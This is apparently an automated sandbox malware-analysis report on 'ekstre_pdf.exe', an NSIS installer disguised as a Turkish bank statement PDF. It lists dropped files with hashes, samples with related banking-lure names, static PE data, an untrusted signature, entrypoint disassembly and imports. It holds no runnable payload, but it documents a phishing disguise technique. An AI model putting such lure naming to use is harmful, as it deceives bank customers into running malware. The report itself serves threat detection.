Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16.001"><path d="M5.469 0c-.49 0-.796.216-1.032.456C4.202.696 4 1.012 4 1.486V2H2v14h12V2h-2v-.406l-.002-.028a1.616 1.616 0 00-.416-1.012c-.236-.278-.62-.584-1.2-.552L10.439 0zM6 2h4v2h2v10H4V4h2z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible" fill="#2e3436"/><path class="success" d="M5 5v8h6V5z" style="marker:none" color="#000" overflow="visible" fill="#33d17a"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\bluetooth-hardware-disabled-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	244
Entropy (8bit):	6.76252753190891
Encrypted:	false
SSDEEP:	6:6v/lhPysJUxEUS1zjiFPEQzQcUHawgwNSZeEPVzo/Vp:6v/7euoaIDw1SRt87
MD5:	43019BCCF1F0AB2AE93CC414792F2894
SHA1:	E1F1B039D643A3902A09C2BBFA3AD7D4FEDAF77C
SHA-256:	BCF53B0B1F0F592BFF0F46AD636A298633FCB8DDF9F25CD3B9C700E9C4765BA7
SHA-512:	D8F28B847A3ED1E6CED906BF1A1280FC3DD00E0C96FA65E017AAFD8F3A7E0DA873FE228976DC5EB6C14B6C22AF983AE932F99E9135E1110844E56518CE00D4B4
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1..P.../j....D=.ZX[.V...J..be!ha....t.....M_...q.j.W..)6......H.H...K3..~P/1..0....3\..8g..s..^..5. ..&.V....h.......u..o......g. ..z...i...f..0..)5...W.$..=.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\changes-prevent-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.813992925778345
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBll4oSFkFFxx3HIgDC/+S6h2FQCl3q5v2p1p:6v/lhPysCo2ED2T6h2eCMQp
MD5:	C0F3510E6D3D3768DC445CF79FEF3CA1
SHA1:	8C46E667DE05A71EDFC326761ACAC4C4CBF8FEBE
SHA-256:	C24FD8D93FB03B92BE5ED78EB9CA1F12D91A9555970FE03BFBCE559CFEE2A873
SHA-512:	EA431F387166A442C3DD2E535E5BF5CF6B8D354642A83DD989A275423A9AB1BC48DC52E49F60A43F44A095F3DADCF65B7D1BF91364D0FEEAD33D184AB1149CEB
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d...._IDAT8.c`...```.......?..e``...#.&!iD...1..T.)..)T..1..l#J........p......,~..aD. .0...,0j.`..A...{>......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\display-projector-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	223
Entropy (8bit):	6.597684514305316
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllHxLvlqTpITLv/ZbF/KDpx10xqWux2qVsemzRQG4:6v/lhPys51+ElF8zXWkVsvNJ4Lbp
MD5:	26DEF1375FBBCEC3D641E521F17E165A
SHA1:	F77E38A1C2B3C069EAFB45339F6A3F86A00CB08F
SHA-256:	260268CB030DA109643E4B391BADC653A046452333A1FC174B7B1371218B0DD2
SHA-512:	C74EEEC70E6E75F59D9FDD18965B40EA590255B223086FB0705615522859CD0541013323042AD1EAEBB803F5871FEFAEFC6DFCBBC42006AB340E37B86593D1D5
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1..@...OK.`R..x...y<.XX...x...........2..o...g.1h.#jT8`..p.....C....`..E.N0....P.E..<....>..3..,.i.Id." 9....D.z..Y$.W-`..A*.>...OP....!w.7 .M.+..K....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\go-previous-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	665
Entropy (8bit):	4.455633152585391
Encrypted:	false
SSDEEP:	12:TMHdPnnl/nu3tlnpZo4iL+o0JWlzkmvtoWlz9vtoWlzKzmdwWlzFzmdwWlM:2dPnnxu3tlTtiL+rJPmvto0vtojzmdw6
MD5:	D3329B3FDCE276378BC23A2B04EFF6FA
SHA1:	1DF694D08D03F1C7C86AB6234507A9364EC5C4E8
SHA-256:	0D26FB049E369AAD5E7ED901B3A255317A4A465008E89026FDE9F624124E2599
SHA-512:	2C4624461FAC6CD5093B8B7818DA17B909A302A216364ABCDD467131EA2C49E2BDCA3E546F69030E4812439F86986F747688EA0F9732CAE053F697A8C3F08B0D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11.707031 2.707031 l -1.414062 -1.414062 l -6.707031 6.707031 l 6.707031 6.707031 l 1.414062 -1.414062 l -5.292969 -5.292969 z m 0 0"/>. <path d="m 11 15 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 2 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 3 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. <path d="m 11 15 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. </g>.</svg>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\network-cellular-signal-ok-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	4.794379716972661
Encrypted:	false
SSDEEP:	24:t4CBGMRtMJyKbRAecFxfceJyyKbRAecFxv:gM0NtAecF4NtAecFN
MD5:	D14E9C0B6A01528F561443DFD435614A
SHA1:	9BF846CCDDBBDAB5459897E0AD6C0D57EBFF8A78
SHA-256:	1E04E0CC787ED019734C184E2FF8EE7234F4DBE4D2BD9FE5AF747B801932759D
SHA-512:	E7729141BD634EBC8B64F11752FB6B9C6BF2D76B446D89C5CE37C3A8631C9E87CC078777E18F7A2AA392CBEA8C525A767A573E95D80B85D59F575F6B588BD261
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747" fill-rule="evenodd"><path d="M12 1v14h3V1zM8 4v11h3V4z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal" overflow="visible" opacity=".35"/><path d="M4 7v8h3V7zm-4 3v5h3v-5z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\task-past-due-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	529
Entropy (8bit):	4.892852889682698
Encrypted:	false
SSDEEP:	12:t4Cp9xekKYxyVLUYxem2eIBCdZ45Vkyj0oprGDB:t4CpoYAtLRD4xZrGDB
MD5:	F19096B6645B8A4F7BCE9C7CD7C20F18
SHA1:	ED988169DF2F4B386D7B8D500494F8B5CB9A932D
SHA-256:	0284F548DD1C1DDA67F06403BA6C43BDF9525F08BE63828A323EE6D56B8BAF28
SHA-512:	59D0CF5C85BCCF5D33E5BAD681325ED7142A804A52F7FBEF5547E2EEDDF95BCDB4D551CAA9164E940856B9DC5458E921E9380CA5CC15D89D61B245F757BE5665
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2.469 1s-1.5 0-1.5 1.5v11.969s0 1.53 1.5 1.53h7.5v-2h-7V3h1V1zm8.5 0v2h1v7h2V2.5c0-1.5-1.5-1.5-1.5-1.5z"/><path d="M5.5 0h3.969c.277 0 .5.223.5.5v3c0 .277-.223.5-.5.5H5.5a.499.499 0 01-.5-.5v-3c0-.277.223-.5.5-.5z"/><path d="M10.969 11h1.375l1.125 1.094L14.563 11h1.406v1.469l-1.094 1.062 1.094 1.063V16H14.53l-1.062-1.063L12.406 16H10.97v-1.406l1.062-1.063-1.062-1.062z" style="marker:none" color="#bebebe" overflow="visible"/></g></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\view-grid-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	864
Entropy (8bit):	4.229106129188113
Encrypted:	false
SSDEEP:	24:2dPnnxu3tlYk/a/lfbofk/a/lfbyuk/a/lfboOuk/a/lfbN:cfn6yNToMyNTy5yNToO5yNTN
MD5:	B9EE7DA0FA40A89BA07E4B055516A7D6
SHA1:	42CF9A685A47BCB00D9F2E835F8ECCBA657BBDB7
SHA-256:	F66898A91D6AC7D40E6CE8F784B4D7AB96A7A899E6EC8C1ED8F5E18F362BC166
SHA-512:	4C9AE07DC1E543E6DA19ED2C6A9EF89977EBA9D5D782C0B6CF03C432539AB04B1C131CFCC98ED0C8BE1A0FFB8F6CBB05F94679306DE1946D06EC8C920097F124
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 2 1 h 4 c 0.550781 0 1 0.449219 1 1 v 4 c 0 0.550781 -0.449219 1 -1 1 h -4 c -0.550781 0 -1 -0.449219 -1 -1 v -4 c 0 -0.550781 0.449219 -1 1 -1 z m 0 0"/>. <path d="m 10 1 h 4 c 0.550781 0 1 0.449219 1 1 v 4 c 0 0.550781 -0.449219 1 -1 1 h -4 c -0.550781 0 -1 -0.449219 -1 -1 v -4 c 0 -0.550781 0.449219 -1 1 -1 z m 0 0"/>. <path d="m 2 9 h 4 c 0.550781 0 1 0.449219 1 1 v 4 c 0 0.550781 -0.449219 1 -1 1 h -4 c -0.550781 0 -1 -0.449219 -1 -1 v -4 c 0 -0.550781 0.449219 -1 1 -1 z m 0 0"/>. <path d="m 10 9 h 4 c 0.550781 0 1 0.449219 1 1 v 4 c 0 0.550781 -0.449219 1 -1 1 h -4 c -0.550781 0 -1 -0.449219 -1 -1 v -4 c 0 -0.550781 0.449219 -1 1 -1 z m 0 0"/>. </g>.</svg>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens144\Nephrosclerosis\Dingwall\weather-showers-scattered-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	445
Entropy (8bit):	4.51691362755301
Encrypted:	false
SSDEEP:	12:t4CDqEX9/F/5ALViJEF/iA9QPGUtaXAcTEZqiAgntl+i:t4CRX9/R5ATx9Ixtu5GtlN
MD5:	EFD75A32702B8A320FD375AA76BEDC2C
SHA1:	B5E951284325DBC369659A15268FAD118EE7E451
SHA-256:	833C458FE920B28C27645FA573EBC2FAE418FC6902FF9F6DECC9CE7FCAB07487
SHA-512:	1AEEE5D9248636F92F4893CC225BF2B6394BD7B17BFAED257E1B3C57713E3F4B05C5092EA3ED5493A3BFE1A9D0649287A136DBE8339F578B436F7578C06A46CF
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M5 1.762a.75.75 0 00-.57.25C4.18 2.302 2 4.908 2 7c0 .774.267 1.5.752 2.045C3.14 9.48 3.843 10 5 10c1.969 0 3-1.509 3-3 0-2.092-2.183-4.698-2.43-4.988a.745.745 0 00-.57-.25zm6 4a.75.75 0 00-.57.25C10.18 6.302 8 8.908 8 11c0 .774.266 1.5.751 2.045C9.138 13.48 9.843 14 11 14c1.969 0 3-1.509 3-3 0-2.092-2.183-4.698-2.431-4.988a.745.745 0 00-.569-.25z" fill="#2e3436"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Elfenbenshvide.Fra179

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	283515
Entropy (8bit):	7.040614661189387
Encrypted:	false
SSDEEP:	3072:8hfVI4KnT/MMfaTFUeRLfcPAYR/v1B/1tVlWLDrYlqPo/GwS4dZ+kx1UvMgbdBi:gVI4+fa/tf+AYR/DVlADrYWQGD4ZQ9ni
MD5:	2826246109B931C329C22CDA9CFF45E4
SHA1:	CA446FE39058D7AD611AD66B6CB0279EABC5672B
SHA-256:	ECB8D90ADFFC951263F49FF8FC34C902BEC39AB36FFB6D9E60DE46870DC6F023
SHA-512:	CE2D8085AE4F8412ED4FF4FDA7A273E135D9B196AEB1F7712D6538B9CA276DEF25725A39B43ADB71904B88866E64F99387E2E5B382C344DB7C114A35E2CAFE9A
Malicious:	false
Preview:	.HH..qqq..............................WWWWW.YY....NNN...\\......\|\|\|..:::::...gggg....o.KK.......'...............ww.................................................-......WWW.z....................%%.7...BB.....................:::...2.....MMM.BBB...KKK...........N....@.44.......!!.w....zz.....``....z..........%%......7........................(.....]..D..[[[[[....^^^..DD....jjj....s..4........^^^^.4........LLL.88....oooooo...........a.r...N.................../..K...........b..uu..........j.....888..v.........x......C....?.........J........`.[[........................''.tttt....`````.............d.....UUUUUU.......::.....Y..L..............FF..................W..........33..uu..............................................[[..................{{...................g................ff....GGGG...........JJJ..............u...jj......HHH......1.....TT............................++............................c............iii.i...?.......................888.}}}}......................~.2..RR....".'

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\audio-headset-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	267
Entropy (8bit):	6.84486685883884
Encrypted:	false
SSDEEP:	6:6v/lhPyss/cJu1JHs/5Wzv0G0AO5MCLbNE6KfxVFcvqEup:6v/7cJHswLZ0AO5cp7V
MD5:	67C457F7BDE615AF6B872976D3093794
SHA1:	4E6C4507C9D829BB33BE9153D35488240A481116
SHA-256:	B815681BB2F25546D53AA58BD5755FB975E3F7C3570C487E80B2AFF7A0CEADEF
SHA-512:	5228383B5AC0E0354F31847E473485F56E542C6130A7FD46D83F11F840B58E96F036C6880892E0774771B56DC2254583203B2C3CD07BBDD5247F64E512678DEE
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1NBQ.........P....4.)X.{P6 4.w!%.........}/T.d.3.....r..<..;.Xc....EYQ{<V=.....Ct....<..]..I..L.~.x..{....85.a.6.p..*5wav...9.........V2 U.y.p...5.......q..5...1...7....:.$.`......=!.xU.....IEND.B`.

C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.9764977667479
Encrypted:	false
SSDEEP:	192:CVA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:CrR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D968CB2B98B83C03A9F02DD9B8DF97DC
SHA1:	D784C9B7A92DCE58A5038BEB62A48FF509E166A0
SHA-256:	A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
SHA-512:	2EE41DC68F329A1519A8073ECE7D746C9F3BF45D8EF3B915DEB376AF37E26074134AF5F83C8AF0FE0AB227F0D1ACCA9F37E5CA7AE37C46C3BCC0331FE5E2B97E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: E-dekont_pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: rE-dekont_pdf.exe, Detection: malicious, Browse Filename: rE-dekont_pdf.exe, Detection: malicious, Browse Filename: AWB_Invoice.exe, Detection: malicious, Browse Filename: AWB_Invoice.exe, Detection: malicious, Browse Filename: Swift_mesaj.exe, Detection: malicious, Browse Filename: Swift_mesaj.exe, Detection: malicious, Browse Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse Filename: Halkbank_Ekstre_20191415_081738_949589.pdf.exe, Detection: malicious, Browse Filename: Dekont.pdf.exe, Detection: malicious, Browse Filename: Dekont.pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@t.s!..s!..s!..!T..t!..8Y..t!..s!..g!...T..w!...T..r!...T..r!...T..r!..Richs!..........................PE..L....c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\DORME.ini

Download File

Process:	C:\Users\user\Desktop\ekstre_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.244518891032036
Encrypted:	false
SSDEEP:	3:UkE74OvrMXMAzovn:izMxEvn
MD5:	3000F7F0F12B7139EA28160C52098E25
SHA1:	9D032395F38D341881019B996E591160D542054B
SHA-256:	467B09FF26622746D205628AE325EC9838461BC5FE741B3757BB39DDEC87ECB1
SHA-512:	A76A2F1E3686E2FFD03388EC7DBCD4AFA6AE53CCD3AA40C6FBBF0C994EEE5E2685D0C412F15EC4506C1175F5A84712E1A8B7AE32E6A0327E1BA47321A59E0EE2
Malicious:	false
Preview:	[ManualPaths]..NumEntries=Hai..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.928383895489483
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ekstre_pdf.exe
File size:	315768
MD5:	a37dc47f86e84e5d0d2e6414c3cd5272
SHA1:	7c9a14ff443cc5de805200d6bcc750d64fb4b677
SHA256:	5902402fafb4be22faca64535718137ce5afd70004a14657daa9e7c6c3240feb
SHA512:	5f7cae8e6dc0f6d35c56ec212943359d78ae792f6dcbd8eb5987c1d8e020c49befa23951788fda56550ca83b05a478c7fbbc0c6178c9b1830b6050741a7638a3
SSDEEP:	6144:XhtyHU2Gthj3FRzxZckklMg0GGOvGmADclkMo6xkHwQEel:Xh4G9NxWBZ0VOvGm+cpRxg/Eel
TLSH:	6E6423A20A70E437D8E246315A79917F9FF2BB2311F85B4397C0A6193D322D1AB1D70B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...R.Oa.................j...:...@.

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9D52 [Sat Sep 25 22:06:10 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Hecatompedon226@Pterylological.Mon, OU="Subflavor Copperytailed ", O=Babi, L=Saint-Gervais, S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/02/2023 07:15:07 31/01/2026 07:15:07
Subject Chain	E=Hecatompedon226@Pterylological.Mon, OU="Subflavor Copperytailed ", O=Babi, L=Saint-Gervais, S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	AD2E39022EA7E0C21A138378865D9B24
Thumbprint SHA-1:	766B5FA40642E11FD242F15605B9C112B9359C61
Thumbprint SHA-256:	4474532F7896D1B9EF268653A92982D97D1817488A9853982E7AFF9D1EDCA361
Serial:	0461CAF6CBD1070C49D0CC3B4A39524337D48D2F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FC454A588AAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FC454A5887Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0047AFB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x178000	0xca8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4b410	0x1d68	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.6661630306603774	data	6.448911271830869	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.4392755681818182	data	5.024109281264143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x71018	0x600	False	0.5227864583333334	data	4.156694807535542	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7c000	0xfc000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x178000	0xca8	0xe00	False	0.41824776785714285	data	4.167017598870357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1781d8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x1784c0	0x100	data	English	United States
RT_DIALOG	0x1785c0	0x11c	data	English	United States
RT_DIALOG	0x1786e0	0x60	data	English	United States
RT_GROUP_ICON	0x178740	0x14	data	English	United States
RT_VERSION	0x178758	0x210	data	English	United States
RT_MANIFEST	0x178968	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
